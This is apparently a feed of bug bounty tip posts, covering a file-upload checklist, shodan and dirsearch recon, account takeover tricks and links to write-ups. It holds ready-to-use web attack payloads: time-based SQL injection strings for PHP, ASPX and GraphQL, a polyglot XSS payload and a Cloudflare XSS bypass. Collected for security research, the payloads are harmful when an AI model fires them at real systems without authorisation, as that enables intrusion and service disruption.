My File Upload Checklist, detailed version of Ahsan Khan checklist, and also some extra methods I personally use and gathered during the time. #BugBounty #BugBountyTip #BugBountyTips #TogetherWeHitHarder #InfoSec

Today, Hackerone took $25k from me, because I am a belarusian citizen. 1/9

Quick tips : How i found 10+ information disclosure in hackerone public program 1/n 1st: collect all ip's from shodan shodan search Ssl.cert.subject.CN:"target.com*" 200 --fields ip_str | httpx | tee ips.txt 2nd: fuzz all ips using dirsearch

use this bot in a telegram to find a subdomain if you don't have a computer you can use this bot #bugbountytips #BugBounty #hackerone #bugs

#quicktip Fastest bounty (30 minutes) Always add magical null byte %00 domain.com/api/pro-player… Response: 503 Service Unavailable Server will be down for some time. Bounty 100$ #bugbountytips #BugBounty

Duplicate email vulnerabilities exist in some companies.😵‍💫 [email protected] email+1@gmail com [email protected] This can lead to a takeover. #infosec #buugbounytips #bugbountytip

Some bugs will never appear in first usage of a bb program. Found Account takeover after spending 10 days on a single target. #BugBounty #bugbountytips #bugbountytip

Some “Hackers” with #bugbountytips 🥸

all my tips and other bug hunters tips here #bugbountytip #bugbountytips doepichack.com/category/tips/

Polyglot payload:⚔️ test+”<%= 7*7 %>’(</script></style></title></textarea><svg/onload=al\u0065rt`1`>) example .com #infosec #cybersec #bugbountytips

Hello everyone, as promised, this is a detailed write-up on how I was able to get an account takeover in HubSpot Public Bug Bounty Program omar0x01.medium.com/4e2047914ab5 #BugBounty #bugbountytips #Pentesting #cybersecurite #infosec ATO

Being a hacker means thinking out of the box! bemodtwz innovates on the GET parameter brute-forcing by hooking JS functions to find new GET parameters as they're being used! #bugbounty #bugbountytips 👇

Have a look at my FIRST bug bounty write-up regarding the RCE i got recently. Do share if you found it helpful. link.medium.com/fumN735PaAb #BugBounty #bugbountytips #hackerone

7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- #bugbountytips #bugbountytip 💕

My personal XSS all-in-one payload Here - branch-delivery-7d5.notion.site/xss-dd37aad820… #bugbountytips #PentestCheatSheets #CheatSheets #pentest #infosecurity #cybersecurity #BugBounty #Hacking #xss

🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑 I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting

Cloudflare XSS bypass : \"><img/src=x/onerro=6><img/src=\"1\"/onerror=alert(1);>